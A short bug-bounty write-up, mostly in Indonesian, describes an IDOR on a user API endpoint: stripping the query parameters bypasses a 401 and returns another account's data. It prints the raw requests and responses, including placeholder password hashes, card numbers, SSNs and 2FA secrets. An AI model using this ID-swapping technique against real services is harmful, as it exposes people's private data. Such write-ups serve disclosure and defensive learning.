IDOR bypassed 401 leading to a leak of personal data

NXRNXR
2 min read

๐Ÿ“Œ Deskripsi Singkat

Saya menemukan kerentanan Insecure Direct Object Reference (IDOR) di endpoint GET /api/user/[id]. Sistem awalnya menampilkan 401 Unauthorized saat mengakses data pengguna lain dengan parameter tertentu. Namun, saat parameter dihapus dari URL, endpoint tersebut justru memberikan respon sukses dan menampilkan data pribadi pengguna lain, tanpa otorisasi yang benar.

๐Ÿ” Langkah Reproduksi

  1. Login sebagai ATTACKER (User A).

  2. Saya menemukan request seperti berikut ketika menelusuri bagian profile

    GET /api/user/12345?token=abc123xyz&include=profile,contacts,settings HTTP/1.1 Host: target-website.comCookie: session_id=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.fake.jwt.token; theme=dark; locale=en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/114.0.0.0 Safari/537.36 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.9 Connection: keep-alive Referer: https://target-website.com/dashboard

    Request ini menampilkan data data pribadi akun milik ATTACKER

    HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-store

    { "user_id": "1234567890", "username": "johndoe", "email": "johndoe@example.com", "password_hash": "$2b$12$EixZaYVK1fsbw1ZfbX3OXe.PxoEwFv0uQ1m07QzH2dq0WyP5fpGuK", "credit_card": { "number": "4111111111111111", "expiry": "12/25", "cvv": "123" }, "social_security_number": "123-45-6789", " bank_account": { "account_number": "9876543210", "routing_number": "021000021" }, "jwt_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...", "two_factor_secret": "JBSWY3DPEHPK3PXP" }

  3. Disini saya mencoba mengganti ID ATTACKER 12345 ke ID akun VICTIM 12346 untuk melihat data data pribadi milik akun victim dan ternyata itu tidak bisa saya mendapatkan โ†’ Respon: 401 Unauthorized.

    HTTP/1.1 401 Unauthorized
    Content-Type: application/json
    WWW-Authenticate: Bearer realm="example", error="invalid_token", error_description="The access token is missing or invalid."

    { "error": "unauthorized", "message": "Authentication required or invalid credentials." }

  4. Setelah itu saya mencoba menghapus semua parameter yang ada pada request line seperti

    GET /api/user/12346 HTTP/1.1
    Host:target-website.com
    Cookie: session_id=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.fake.jwt.token; theme=dark; locale=en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/114.0.0.0 Safari/537.36 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.9 Connection: keep-alive
    Referer: https://target-website.com/dashboard

  5. Dan ternyata ini berhasil melewati 401!! saya dapat melihat data data pribadi akun VICTIM muncul di respon

    {
    "user_id": "1234567890",
    "username": "albert",
    "email": "ablert@example.com",
    "password_hash": "$$2b$12$X5jVq3nySlDFG8WqQIwYQesJ2Rb6x9twQ4Q49gJLbYqRpItGmfP5C",
    "credit_card": { "number": "5111111111111113", "expiry": "10/28", "cvv": "124" },
    "social_security_number": "125-46-6889",
    "bank_account": { "account_number": "9276443211", "routing_number": "023000022" },
    "jwt_token": "eyJfhwefJHWHFWHjwgfhwjGEEJJRTRJWrjg...",
    "two_factor_secret": "JBSEIHWHFWEIOJWRTG"
    }

    *Jeder Duplicate

1
Subscribe to my newsletter

Read articles from NXR directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

NXR
NXR